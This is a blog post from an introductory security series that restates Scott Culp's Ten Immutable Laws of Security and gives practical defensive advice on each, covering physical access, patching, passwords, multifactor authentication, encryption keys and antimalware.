J003-Content-Security101-The-Ten-Immutable-Laws-of-Security-Revisited_SQFifteen years…! Wow, how time flies. It was 15 years ago that Microsoft security researcher (now a Director at Microsoft) Scott Culp penned an article called “Ten Immutable Laws of Security.” That coincided with my blossoming interest in Information Security, which is why the fact that it was 15 years ago seems so shocking to me. Apparently, time really does fly when you’re having fun.

Culp’s Ten Laws have been updated, with version 2.0 as the current one, but the basic message is the same and it is core for any IT professional looking to get into Information Security to not only know and understand, but to actually internalize as a way of doing things. Since this is a 101 level review of Information Security, I want to take a few moments to make sure you are aware of these laws, and to discuss what they mean to you today. Please click the link above to see the laws and read Microsoft’s take on them, but I am also going to reproduce the laws themselves below with some additional guidance on each.

Law #1: If a bad guy can persuade you to run his program on your computer, it’s not solely your computer anymore.

Phishing scams, link bait, hacked software, hacks for software, keygens, screensavers, games, codecs, media files… the list goes on and on. Search for anything online you might wish to download, and odds are extremely good that you will find the majority of the links on the first page of your search results will go to downloads that are for anything other than what you really want to download. Check out torrent sites or other sources for what includes binaries of questionable origin, and I guarantee you that most of those downloads are crawling with badness. Everyone wants something for nothing, and the bad guys are happy to use that to their advantage. Set aside the morality and the legality of downloading copyrighted content without paying for it… is it really worth the risk that your computer won’t be yours anymore?

Law #2: If a bad guy can alter the operating system on your computer, it’s not your computer anymore.

Consider how many “fixes” are “documented” online to correct this behavior or to patch that bug. How many posts consist of “download this file from my site to fix that error” and how many of those sites have nothing at all to do with the vendor of your operating system? This is NOT just a problem for Windows users, so don’t think that all repos can be trusted. When you are considering patching, upgrading, or recompiling your operating system, whether it’s a binary or new source you want to compile from scratch… if you cannot read and understand the code yourself, and it’s not coming from the maker directly, don’t trust it. If it is coming from the vendor, make sure that either the digital signatures or the checksums of the downloads check out okay or abandon the file(s) as bad.

Law #3: If a bad guy has unrestricted physical access to your computer, it’s not your computer anymore.

If they can touch it, they can own it. Any system a bad guy has direct physical access to is his or hers to do with as they please. Don’t leave your computer unlocked when you are away from it. Don’t leave it out in the open in a hotel room when you travel. Ensure your workplace provides adequate physical security for all systems. You know that PC the receptionist uses that is sitting in the elevator lobby which anyone can walk up to? Yeah, if your building is not locked down so you need a badge to even get onto your floor, then that PC needs to be locked away every day at the end of the shift.

Law #4: If you allow a bad guy to run active content on your website, it’s not your website any more.

Limit what can and cannot be uploaded to your website or forums. Quarantine and scan any files that are uploaded by users. Regularly and frequently run security scans of your website and all content, and ensure it cannot be exploited by injection or cross-site scripting. One of the most common ways end users’ machines are infected is by visiting a trusted site that is unaware it is hosting bad things.

 Law #5: Weak passwords trump strong security.

There is no variant of P@ssw0rd or p@$$word or Password1 or even b70w$$@q that hasn’t been used by someone enough times that it won’t be in the first 10,000 passwords tried by a brute force attack. And since it will take less than .007 seconds to go through those 10,000 passwords using even the underpowered processing capabilities of a discount tablet, you really want better. I’m going to let you in on a little secret. All passwords are weak. There is no such thing as a strong password, at least when you measure it up against the strength of a dedicated adversary determined to crack it.

The best thing you can do is use multifactor authentication, period. Whether you use a smart card, or a token, or an app on your mobile phone, even if someone does guess a user’s password (or tricks them into giving it away) without that second factor of authentication, it’s of no use to them. You can even go with biometrics if you have the budget for it, but 2FA using a mobile device can be used from any system, and doesn’t have the SciFi creep factor associated with it!

Law #6: A computer is only as secure as the administrator is trustworthy.

Reference checks, employment checks, credit checks, criminal record checks, background investigations… how far does your HR team take their responsibility of looking into new hires? You may not need to do a full scope background investigation on the receptionist or the delivery driver, but IT sysadmins have access to everything that is on the network. They can read the CEO’s emails, pull the payroll history for anyone in the company, learn just what the secret recipe of the Colonel’s chicken is that makes you crave it fortnightly! Ensure that anyone with privileges to any system is fully checked out before hiring.

Law #7: Encrypted data is only as secure as its decryption key.

Which means if the key exchange is weak, or the key itself is, then your encryption is at risk. The only thing worse than an insecure key is using a proprietary algorithm. Stick with commercially recognized encryption protocols, and if you must use and exchange a pre-shared key, do so out of band to the data exchange. In other words, don’t email someone the password to decrypt the file you just emailed them! Call them, text them, send them smoke signals, anything but sending the password using the same method as you sent the data.

Law #8: An out-of-date antimalware scanner is only marginally better than no scanner at all.

I always go one further than this and say it’s worse. If I am on a machine that has no antimalware, I won’t download or install anything that I am not absolutely sure of. I’d say most others would feel the same way. But if antimalware is on the machine, I may not be as circumspect, opting instead to count on the antimalware to keep me safe. Of course, if it is out of date, it’s useless, but that won’t stop me from being stupid!

Law #9: Absolute anonymity isn’t practically achievable, online or offline.

Sure, you can live in a cave and bounce your signal off a neighbor’s insecure Wi-Fi, routing it through three different TOR networks and an open web proxy, then through a Ukrainian satellite before you reach your goal… but wait, this isn’t a Hollywood spy thriller so that isn’t practical or even realistic. There is always a log somewhere, and anything you do online you should assume will stay online forever, and eventually be seen by your grandmother. Don’t be stupid, don’t be rude, and don’t do something your meemaw would be ashamed of!

Law #10: Technology is not a panacea.

There is no firewall that cannot be bypassed. There is no hardening procedure that is bulletproof. There does not exist encryption that cannot be broken given enough CPU cycles, nor is there code written without vulnerabilities. Technology is not a panacea and there is no one solution that can make you 100% guaranteed secure. Work on the human aspect, minimize the opportunities for attackers to find something to exploit, keep up to date on patching and malware definitions, and use a layered defense to do the best you can.

Learn them. Live them. Love them. Make them a part of who you are, and help instill in your users, your friends, and your family an awareness of the same. These ten laws are not just for sysadmins, they are for anyone using technology. But stay tuned! In our next post in this series, we are going to take a look at a related set of laws laid down by Culp – The 10 Immutable Laws of Security Administration.